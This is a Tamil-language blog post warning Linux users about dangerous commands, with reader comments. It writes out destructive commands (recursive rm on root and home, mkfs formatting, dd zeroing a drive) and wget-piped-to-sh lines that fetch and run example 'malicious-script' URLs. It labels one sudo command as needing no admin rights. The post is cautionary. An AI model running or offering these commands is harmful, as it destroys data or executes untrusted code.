Pages

Monday, August 23, 2010

லினக்ஸில் பயன்படுத்தக்கூடாத command

நீங்கள் லினக்ஸில் உள்ள command நன்றாக தெரிந்தாலும் ஒரு சில விபரீத வேலைச் செய்யும் நிறைய command உள்ளது அந்த command னை முழுமையாக தெரிந்துக்கொண்டால் தான் நாம் எந்த ஒரு தவறு செய்தாலும் அதனை சரி செய்ய முடியும். சரி இந்த பதிவில் வினோத command னை பார்போம். இந்த பதிவை எழுதக் காரணம் எனக்கு ஏற்பட்ட நிகழ்வு தங்களுக்கு ஏற்பட வேண்டாம் என்ற ஒரு நோக்கத்தில் தான்,பின்வரும் command னை ubuntu நியங்குதளத்தில் பயன்படுத்தி பார்க்க வேண்டாம்

இந்த command னை முழுமையாக லினக்ஸ் command பற்றி தெரியாதவர்கள் பயன்படுத்த வேண்டாம்

Example:-

sudo rm -rf / (will delete all your files on your system) - required administrator rights!

sudo rm -rf . (will delete the current directory your in) - required administrator rights!

sudo rm -rf * (will delete all the files in the current folder) - required administrator rights!

rm -rf * or rm -rf *.* ( will delete all the files in the current folder) - No administrator rights needed!

rm -rf ~/ & ( will destroy your home directory) - No administrator rights needed.

இந்த command hard disk ல் உள்ள data வினை அனைத்தயும் நீக்கி விடும்.

Example:-

sudo mkfs (will format your hard drive) - required administrator rights!

sudo mkfs.ext3 ( will format your hard drive) - required administrator rights!

sudo mkfs.bfs ( will format your hard drive) - required administrator rights!

sudo mkfs.cramfs ( will format your hard drive) - No administrator rights needed!

sudo mkfs.ext2 (will format your hard drive) - required administrator rights!

sudo mkfs.minix (will format your hard drive) - required administrator rights!

sudo mkfs.msdos (will format your hard drive) - required administrator rights!

sudo mkfs.reiserfs (will format your hard drive) - required administrator rights!

sudo mkfs.vfat (will format your hard drive) - required administrator rights!


இந்த dd command மிகவும் அபாயக்கரமான command,இதனை பயன்படுத்தும் முன் ஒரு முறை யோசிக்க வேண்டும்.


sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) ( required administrator rights)

sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)

sudo dd if=something of=/dev/hda (Needs administrator rights)

shellscript இதனைக் கொண்டு என்ன வேண்டுமானாலும் செய்ய முடியும் லினக்ஸ் கணினியை.நீங்கள் எந்த ஒரு website ல்லிருந்து script program னை run செய்யும் போது கவனமாக run செய்ய வேண்டும்.shell script னை wordpad ல் open செய்து அதில் உள்ள command னை தெரிந்துக்கொள்ள வேண்டும்.

CODE :
wget http://my_site/my_file
sh ./some_file

Example :

wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script

or

wget http://my_site/my_file -O- | sh

Example :

wget http://ihrd.org/malicious-script -O- | sh

10 comments:

  1. மிகவும் பயனுள்ள பதிவு... மிக்க நன்றி :-)

    ReplyDelete
  2. நல்லவேளை லினக்ஸ் பேரை காப்பாத்திட்டீங்க. இல்லேனா ...

    ReplyDelete
  3. தங்களின் கருத்துக்கு மிக்க நன்றி!!! இல்லேனா ஒன்னு ஆகாது சார்

    ReplyDelete
  4. Mr. Chandra sekeran,
    I just started reading your blog.
    Since we are on the topic of 'sudo', is it possible to write about how to setup 'sudo' along with sudoers file in Linux.

    That seems to be different for each flavor of Linux .

    Thanks
    Arul

    ReplyDelete
  5. நல்ல பதிவு,

    திருத்தி கொள்ளவும்
    //ubuntu நியங்குதளத்தில் பயன்படுத்தி பார்க்க வேண்டாம்//

    ubuntu இயங்குதளத்தில் பயன்படுத்தி பார்க்க வேண்டாம்

    ReplyDelete
  6. லினக்ஸ் நான் பயன்படுத்திறதில்லை. ஆனால் பயன்படுத்தி பார்த்திருக்கிறேன். நல்லாதான் இருந்திச்சு. விண்டோஸ் செட்டாயிடுச்சு அதனால மாற முடியலை.

    உங்களை போல பல லினக்ஸ்/உபுண்டு பதிர்வகளின் பிளாக்குகளை பார்த்துள்ளேன். தமிழ் எங்கும் வளர்கிறது! வாழ்த்துக்கள்! நன்றிகள்!

    ReplyDelete
  7. How to recover a folder in Linux?
    Eg: rm -rf /root/flag/test
    how to recover test file in remote server.

    Balaji Yadhav

    ReplyDelete